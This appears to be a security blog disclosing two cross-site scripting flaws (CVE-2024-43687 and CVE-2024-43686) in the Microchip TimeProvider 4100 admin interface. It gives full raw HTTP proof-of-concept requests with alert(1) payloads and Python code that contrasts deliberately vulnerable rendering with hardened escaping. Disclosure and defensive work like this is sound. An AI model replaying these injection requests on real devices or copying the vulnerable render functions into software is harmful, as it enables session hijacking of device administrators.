Wednesday, October 16, 2024

CVE-2024-43687: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER DEVICE (BANNER) - STORED XSS


Carrying on with the analysis of the "TimeProvider 4100 grandmaster device", a Stored Cross-Site Scripting (XSS) vulnerability was identified in the custom banner configuration field.

TimeProvider 4100 Grandmaster Device

The embedded web server does not sanitize the "txtcustom" parameter and stores its value in the database as received. The malicious JavaScript payload is then included in the server responses sent to every user who visits the device's web administration interface, and it is executed in the victim's browser.
The following image shows an example of a request containing the malicious JavaScript payload:



Request RAW:

POST /bannerconfig HTTP/1.1
Host: 192.168.1.1
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502
Content-Length: 673
Origin: https://192.168.1.1
Referer: https://192.168.1.1/bannerconfig
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: keep-alive

-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="user_level"

1
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="bannerradio"

CUSTOMIZED
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="txtcustom"

<img src=a onerror=alert(1)>
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="action"

applybanner
-----------------------------9680247575877256312575038502--
# End


Payload execution on the victim’s browser:




The injected malicious JavaScript payload can also be viewed by logging into the device's SSH service. An example of such a connection follows:




Conclusion:

A threat actor exploiting this vulnerability can perform phishing attacks and session hijacking, thereby compromising the confidentiality, integrity and availability of the device.
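The root cause described above is a missing output encoding step when the stored "txtcustom" value is written back into the page. The following is an added example (not the device's firmware code) that contrasts a hypothetical rendering routine mirroring the flaw with a hardened one; the template markup and the banner allow-list are assumptions.

```python
import html
import re

# Constructed sample: the banner value submitted in the advisory's request,
# exactly as the device would store it ("txtcustom" is not sanitized).
STORED_BANNER = '<img src=a onerror=alert(1)>'


def render_banner_vulnerable(banner: str) -> str:
    """Hypothetical rendering that mirrors the flaw: the stored value is
    concatenated into the page unchanged, so the browser parses it as HTML."""
    return f'<div class="banner">{banner}</div>'


def render_banner_hardened(banner: str) -> str:
    """Fix: HTML-escape the value at render time, for the HTML body context.
    Any markup inside the stored banner becomes inert text."""
    return f'<div class="banner">{html.escape(banner, quote=True)}</div>'


# Defence in depth (assumed policy): a login banner is a short plain-text
# notice, so reject anything outside a conservative allow-list before storing.
BANNER_ALLOWED = re.compile(r"^[A-Za-z0-9 .,;:!?()'\-\n]{1,256}$")


def validate_banner_input(banner: str) -> bool:
    """Return True only for banner text that matches the allow-list."""
    return BANNER_ALLOWED.fullmatch(banner) is not None


if __name__ == '__main__':
    print('vulnerable:', render_banner_vulnerable(STORED_BANNER))
    print('hardened:  ', render_banner_hardened(STORED_BANNER))
    print('accepted:  ', validate_banner_input(STORED_BANNER))
```

The same stored value is also printed by the SSH login banner, which is a second output context; escaping for HTML does nothing there, so each context needs its own encoding.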

Reporting Information:


CVE Identifier: CVE-2024-43687
CVSS Score: 8.0
Affected Versions: Firmware 1.0 through 2.4.7
Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43687
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.






Tuesday, October 08, 2024

CVE-2024-43686 - MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - REFLECTED CROSS-SITE SCRIPTING XSS


While going through the administrative interface of the “Microchip TimeProvider® 4100 Grandmaster TP4100” device, the following behaviour was observed.

TimeProvider 4100 Grandmaster Device

A particular parameter, channelId, was found to have its content reflected in the embedded web server's responses; specifically, in the request that updates the charts.

Continuing along this path, after several attempts it was possible to inject a JavaScript payload between <script> tags, resulting in a Reflected Cross-Site Scripting vulnerability. The following image shows an example of a request containing the malicious JavaScript payload:





Request RAW:

POST /get_chart_data HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 99
Origin: https://XXX.XXX.XXX.XXX
Referer: https://XXX.XXX.XXX.XXX/perfmon_t1e1_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

metric=mtie_a&xRange=1&tStart=-1&channelName=span&channelId=1%3cscript%3ealert(1)%3c%2fscript%3easd


Payload execution on the victim’s browser:




Conclusion:


An unauthenticated user can insert JavaScript snippets into the channelId parameter of the POST request to the get_chart_data web resource. In the worst case, attackers can perform privileged operations by stealing an administrative user's session, or gain access to sensitive information belonging to the user.
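Because channelId is reflected inside a script block, the decoded payload closes the block with </script> and opens its own. The following is an added example (not the device's code) showing the decoded parameter from the request above, a hypothetical response fragment that mirrors the flaw, and the two server-side fixes a defender would apply: strict validation of channelId as an integer, and script-safe JSON encoding for any value that legitimately has to reach a script context. The response template and the 4-digit limit are assumptions.

```python
import json
import re
from typing import Optional
from urllib.parse import parse_qs

# Constructed sample: the URL-encoded body from the advisory's request.
RAW_BODY = ('metric=mtie_a&xRange=1&tStart=-1&channelName=span'
            '&channelId=1%3cscript%3ealert(1)%3c%2fscript%3easd')


def parse_channel_id(body: str) -> str:
    """Decode the form body and return channelId as the server sees it."""
    return parse_qs(body).get('channelId', [''])[0]


def reflect_vulnerable(channel_id: str) -> str:
    """Hypothetical response fragment mirroring the flaw: the parameter is
    echoed verbatim inside a script block, so </script> breaks out of it."""
    return f'<script>var channelId = "{channel_id}";</script>'


CHANNEL_ID = re.compile(r'\d{1,4}')  # assumed: chart channels are small integers


def validate_channel_id(channel_id: str) -> Optional[int]:
    """Primary fix: accept only a short decimal integer; anything else is
    rejected (the handler should answer 400) instead of being reflected."""
    return int(channel_id) if CHANNEL_ID.fullmatch(channel_id) else None


def js_safe_json(value) -> str:
    """Secondary fix for values that must reach a script context: JSON-encode,
    then escape the characters that could terminate the <script> element."""
    return (json.dumps(value)
            .replace('<', '\\u003c').replace('>', '\\u003e').replace('&', '\\u0026'))


def reflect_hardened(channel_id: str) -> str:
    """Validate first, then emit the value through the script-safe encoder."""
    cid = validate_channel_id(channel_id)
    if cid is None:
        raise ValueError('invalid channelId')
    return f'<script>var channelId = {js_safe_json(cid)};</script>'


if __name__ == '__main__':
    cid = parse_channel_id(RAW_BODY)
    print('decoded parameter:', cid)
    print('vulnerable:', reflect_vulnerable(cid))
    print('validated: ', validate_channel_id(cid))
    print('encoded:   ', js_safe_json(cid))
```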


Reporting Information:


CVE Identifier: CVE-2024-43686
CVSS Score: 8.0
Affected Versions: Firmware 1.0 through 2.4.7
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43686
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-reflected-xss-vulnerability
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.